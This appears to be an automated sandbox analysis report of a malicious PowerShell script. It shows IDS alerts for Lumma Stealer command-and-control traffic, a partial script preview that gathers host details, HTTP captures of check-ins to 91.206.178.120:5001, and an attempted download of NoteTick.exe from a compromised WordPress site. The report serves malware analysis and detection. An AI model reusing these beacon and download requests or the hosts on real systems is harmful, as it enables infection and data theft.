                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....................t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^RZ.;...........................%..A.p.p.D.a.t.a...B.V.1.....RZ.;..Roaming.@......CW.^RZ.;..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DWO`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................%E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                      File type:ASCII text, with very long lines (706), with no line terminators
                                                                      Entropy (8bit):5.390306751239133
                                                                      TrID:
                                                                        File name:XkgoE6Yb52.ps1
                                                                        File size:706 bytes
                                                                        MD5:ec5ea6c135974c85204bd38525329e5b
                                                                        SHA1:131f8dfd360bf7fffbbff91f264f0664c72b724c
                                                                        SHA256:042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635
                                                                        SHA512:d04af0ceacd0a65ceb0a2c666e52442bba2d05e2960ca08a35b8eb4cac55470e587a2d07cad5cee071e53a748c67bdbf68f15fa4795fa1874176405b87cf2880
                                                                        SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG35+tmvy5hu1M4AGs6Y:BP3wEqHu25xxUlpLhNHAf3i5htORY
                                                                        TLSH:DB01C031B33C428583D5C860B4B9B712D0576B40A55EECFC76FC2001C7832E23DA0918
                                                                        File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T
                                                                        Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-18T08:29:03.230549+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49731 | 104.26.13.205 | 80 | TCP
2025-02-18T08:29:05.575867+0100 | 2860232 | ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) | 1 | 192.168.2.4 | 49732 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:29:05.575867+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49732 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:29:05.588539+0100 | 2860233 | ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) | 1 | 91.206.178.120 | 5001 | 192.168.2.4 | 49732 | TCP
2025-02-18T08:29:06.738323+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49733 | 185.211.7.193 | 443 | TCP
2025-02-18T08:29:06.738323+0100 | 2021697 | ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious | 1 | 192.168.2.4 | 49733 | 185.211.7.193 | 443 | TCP
2025-02-18T08:29:08.328516+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49737 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:29:08.328516+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49737 | 91.206.178.120 | 5001 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Feb 18, 2025 08:29:52.785151958 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:52.790086031 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:52.790199041 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:52.795046091 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:53.277612925 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:53.445013046 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:53.450069904 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:53.450129032 CET6519853192.168.2.4162.159.36.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:29:02.692496061 CET | 60488 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:29:02.699337959 CET | 53 | 60488 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:29:05.591137886 CET | 52221 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:29:05.634382010 CET | 53 | 52221 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:29:06.941977978 CET | 65033 | 53 | 192.168.2.4 | 1.1.1.1
Feb 18, 2025 08:29:06.949064016 CET | 53 | 65033 | 1.1.1.1 | 192.168.2.4
Feb 18, 2025 08:29:52.784485102 CET | 53 | 60305 | 162.159.36.2 | 192.168.2.4
Feb 18, 2025 08:29:53.519424915 CET | 53 | 49163 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 18, 2025 08:29:02.692496061 CET | 192.168.2.4 | 1.1.1.1 | 0xca25 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:05.591137886 CET | 192.168.2.4 | 1.1.1.1 | 0x6dde | Standard query (0) | goutteuy.com | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:06.941977978 CET | 192.168.2.4 | 1.1.1.1 | 0x395a | Standard query (0) | maxcdn.bootstrapcdn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 18, 2025 08:29:02.699337959 CET | 1.1.1.1 | 192.168.2.4 | 0xca25 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:02.699337959 CET | 1.1.1.1 | 192.168.2.4 | 0xca25 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:02.699337959 CET | 1.1.1.1 | 192.168.2.4 | 0xca25 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:05.634382010 CET | 1.1.1.1 | 192.168.2.4 | 0x6dde | No error (0) | goutteuy.com |  | 185.211.7.193 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:06.949064016 CET | 1.1.1.1 | 192.168.2.4 | 0x395a | No error (0) | maxcdn.bootstrapcdn.com |  | 104.18.10.207 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:29:06.949064016 CET | 1.1.1.1 | 192.168.2.4 | 0x395a | No error (0) | maxcdn.bootstrapcdn.com |  | 104.18.11.207 | A (IP address) | IN (0x0001) | false
                                                                        • goutteuy.com
                                                                        • maxcdn.bootstrapcdn.com
                                                                        • api.ipify.org
                                                                        • 91.206.178.120:5001
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.26.13.205 | 80 | 6808 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:29:02.713057995 CET | 158 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: api.ipify.org
    Connection: Keep-Alive
Feb 18, 2025 08:29:03.178155899 CET | 430 | IN | HTTP/1.1 200 OK
    Date: Tue, 18 Feb 2025 07:29:03 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: keep-alive
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
    CF-RAY: 913c4dca7c860fa7-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1537&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
    Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 91.206.178.120 | 5001 | 6808 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:29:04.343100071 CET | 264 | OUT | GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
    Connection: Keep-Alive
Feb 18, 2025 08:29:05.565612078 CET | 174 | IN | HTTP/1.1 200 OK
    Server: Werkzeug/3.1.3 Python/3.10.12
    Date: Tue, 18 Feb 2025 07:29:05 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 21
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 91.206.178.120 | 5001 | 6808 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:29:07.664241076 CET | 170 | OUT | GET /script_end?random_number=33884 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
Feb 18, 2025 08:29:08.318006992 CET | 174 | IN | HTTP/1.1 200 OK
    Server: Werkzeug/3.1.3 Python/3.10.12
    Date: Tue, 18 Feb 2025 07:29:08 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 19
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 185.211.7.193 | 443 | 6808 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-18 07:29:06 UTC | 209 | OUT | GET /wp-content/plugins/header-footer/images/NoteTick.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: goutteuy.com
    Connection: Keep-Alive
2025-02-18 07:29:06 UTC | 472 | IN | HTTP/1.1 404 Not Found
    Connection: close
    content-type: text/html
    last-modified: Fri, 07 Jan 2022 09:51:35 GMT
    etag: "999-61d80d27-4ab5739bf7ac3281;;;"
    accept-ranges: bytes
    content-length: 2457
    date: Tue, 18 Feb 2025 07:29:06 GMT
    server: LiteSpeed
    platform: hostinger
    panel: hpanel
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2025-02-18 07:29:06 UTC896INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69
                                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# si
                                                                        2025-02-18 07:29:06 UTC1561INData Raw: 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69
                                                                        Data Ascii: bsolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks li


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.18.10.207 | 443 | 6808 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-18 07:29:07 UTC | 344 | OUT | GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: maxcdn.bootstrapcdn.com
    Connection: Keep-Alive
2025-02-18 07:29:07 UTC | 952 | IN | HTTP/1.1 200 OK
    Date: Tue, 18 Feb 2025 07:29:07 GMT
    Content-Type: text/css; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    CDN-PullZone: 252412
    CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
    CDN-RequestCountryCode: US
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=31919000
    ETag: W/"ec3bb52a00e176a7181d454dffaea219"
    Last-Modified: Mon, 25 Jan 2021 22:03:59 GMT
    CDN-ProxyVer: 1.06
    CDN-RequestPullSuccess: True
    CDN-RequestPullCode: 200
    CDN-CachedAt: 12/24/2024 11:48:40
    CDN-EdgeStorageId: 718
    timing-allow-origin: *
    cross-origin-resource-policy: cross-origin
    X-Content-Type-Options: nosniff
    CDN-Status: 200
    CDN-RequestTime: 0
    CDN-RequestId: e6a91a8b3f8912bc7b5ad8b75eed4780
    CDN-Cache: HIT
    CF-Cache-Status: HIT
    Age: 2070229
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 913c4de5fc104333-EWR
    alt-svc: h3=":443"; ma=86400
                                                                        2025-02-18 07:29:07 UTC417INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
                                                                        Data Ascii: 7bfa/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 6f 75 74 6c 69 6e 65 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62
                                                                        Data Ascii: u,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{b
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63
                                                                        Data Ascii: {height:auto}input[type=search]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearanc
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 3f 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66
                                                                        Data Ascii: :1px solid #ddd!important}}@font-face{font-family:'Glyphicons Halflings';src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format('embedded-opentype'),url(../fonts/glyphicons-halflings-regular.wof
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 5c 65 30 31 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 6f 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 36 22 7d 2e 67 6c 79 70 68
                                                                        Data Ascii: \e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyph
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69
                                                                        Data Ascii: con-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-hei
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 70 68 69 63 6f 6e 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 6c 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 69 6e 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                                        Data Ascii: phicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{cont
Target ID: 0
Start time: 02:29:00
Start date: 18/02/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Imagebase: 0x1e0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 02:29:00
Start date: 18/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 02:29:01
Start date: 18/02/2025
Path: C:\Windows\System32\notepad.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Imagebase: 0x7ff7c9fc0000
File size: 201'216 bytes
MD5 hash: 27F71B12CB585541885A31BE22F61C83
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false